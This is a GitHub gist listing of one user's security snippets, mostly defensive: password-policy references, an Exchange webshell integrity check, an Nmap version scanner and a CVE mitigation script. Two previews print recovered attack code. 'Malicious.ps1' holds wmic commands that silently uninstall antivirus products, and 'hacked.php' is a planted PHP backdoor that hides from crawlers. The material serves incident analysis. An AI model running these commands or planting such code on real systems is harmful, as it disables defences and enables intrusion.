Skip to content

Instantly share code, notes, and snippets.

@technion
technion / Password References.md
Last active October 15, 2024 09:39
A set of references on modern password policies

References on modern password policies

Below links provide source, reference link and relevant quote

Standards

NIST

https://github.com/usnistgov/800-63-3/blob/nist-pages/sp800-63b/sec5_authenticators.md

Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically).However, verifiers SHALL force a change if there is evidence of compromise of the authenticator.

Major organisations

@technion
technion / Malicious.ps1
Created March 20, 2021 09:45
RE on Hafnium exploited server
$v='ipc';
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
@technion
technion / acme-client-runner.rb
Last active August 8, 2023 16:29
Runs Acme Client
#!/usr/bin/env ruby
# We're going to need a private key.
require 'openssl'
# Initialize the client
require 'acme/client'
# We need an ACME server to talk to, see github.com/letsencrypt/boulder
ENDPOINT = 'https://acme-v01.api.letsencrypt.org/'
#ENDPOINT = 'https://acme-staging.api.letsencrypt.org'
ACCOUNT_FILE = 'account_key.pem'
<#
Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Usage:
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
#!/usr/bin/env ruby
require 'httparty'
FILELIST = [
'/dropbox.zip',
'/robots.txt', # Not from the original list - this serves as a sanity check as it usually exists
'/css/business-frontpage.css',
'/newphase.zip',
'/Doc.zip',
'/wp-content.zip',
def instacheck(name)
unless /[a-z0-9._]{,30}/.match(name)
return false
end
if /\.\./.match(name)
return false
end
@technion
technion / hacked.php
Created December 30, 2021 09:01
hacked php
<?php
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
@technion
technion / Exchange Version.nse
Created November 17, 2021 22:50
Scan Microsoft Exchange Version for vulnerability
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {"technion@lolware.net"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}
-- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932
@technion
technion / CVE-2021-40444Mit.ps1
Last active September 12, 2021 08:43
CVE-2021-40444 Mitigation Script
Set-Strictmode -Version 2
# Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
for($i = 0; $i -le 3; $i++) {
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
if (-not (Test-Path $RegPath)) {
New-Item $RegPath -Force
}
@technion
technion / AutorunsVT.ps1
Created April 23, 2021 01:05
Review CSV file from autorunsc.exe a and handle Virustotal detections
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
continue
}
Write-Output $detection